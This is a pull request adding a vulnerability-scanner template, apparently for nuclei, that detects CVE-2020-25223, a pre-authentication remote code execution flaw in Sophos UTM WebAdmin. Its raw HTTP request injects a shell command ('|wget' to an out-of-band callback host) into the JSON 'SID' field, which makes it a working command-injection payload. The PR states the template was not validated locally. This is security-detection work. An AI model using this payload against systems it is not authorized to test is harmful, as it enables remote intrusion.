### PR TITLE
Create CVE-2020-25223.yaml

### DIFF
--- a/cves/2020/CVE-2020-25223.yaml
+++ b/cves/2020/CVE-2020-25223.yaml
@@ -26,7 +26,7 @@ requests:
         Sec-Fetch-Dest: empty
         Sec-Fetch-Mode: cors
         Sec-Fetch-Site: same-origin
-        
+
         {"objs": [{"FID": "init"}], "SID": "|wget http://{{interactsh-url}}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}
 
     matchers:

--- a/cves/2020/CVE-2020-25223.yaml
+++ b/cves/2020/CVE-2020-25223.yaml
@@ -1,0 +1,36 @@
+id: CVE-2020-25223
+
+info:
+  name: Sophos UTM - Preauth RCE
+  author: gy741
+  severity: critical
+  description: A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11
+  reference: |
+    - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
+  tags: cve,cve2020,sophos,rce,oob
+
+requests:
+  - raw:
+      - |
+        POST /var HTTP/1.1
+        Host: {{Hostname}}
+        Accept: text/javascript, text/html, application/xml, text/xml, */*
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        X-Requested-With: XMLHttpRequest
+        X-Prototype-Version: 1.5.1.1
+        Content-type: application/json; charset=UTF-8
+        Origin: {{BaseURL}}
+        Connection: close
+        Referer: {{BaseURL}}
+        Sec-Fetch-Dest: empty
+        Sec-Fetch-Mode: cors
+        Sec-Fetch-Site: same-origin
+        
+        {"objs": [{"FID": "init"}], "SID": "|wget http://{{interactsh-url}}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2020-25223.

```
A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11
```

- References: https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

### Template Validation

I've validated this template locally?
- [ ] YES
- [v] NO
